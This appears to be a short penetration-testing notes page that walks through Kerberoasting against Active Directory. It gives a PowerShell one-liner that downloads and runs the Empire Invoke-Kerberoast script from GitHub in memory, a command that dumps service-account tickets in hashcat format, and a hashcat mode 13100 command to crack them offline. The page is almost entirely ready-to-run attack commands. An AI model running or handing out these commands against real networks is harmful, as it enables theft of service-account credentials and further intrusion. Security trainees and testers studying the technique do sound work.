# Get SPN Account Ticket with Invoke-Kerberoast

### Installing Invoke-Kerberoast script

Lets first get the Powershell Invoke-Kerberoast script.

```powershell
iex(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1')
```

***

### Loading into Memory

Now lets load this into memory:

```powershell
Invoke-Kerberoast -OutputFormat hashcat |fl
```

You should get a SPN ticket. 

<figure><img src="https://1920086362-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDfv51K0WXLZdwTryHQZc%2Fuploads%2FdDduFrKx0WcQIuKEobmt%2Fimage.png?alt=media&#x26;token=ec1270dc-661b-42d3-86c6-bb4790ae5839" alt=""><figcaption></figcaption></figure>

***

### Cracking Hash using Hashcat

The type of hash we're cracking is **Kerberos 5 TGS-REP etype 23** and the hashcat code for this is **13100**

```bash
hashcat -m 13100 -​a 0 hash.txt wordlist --force
```

***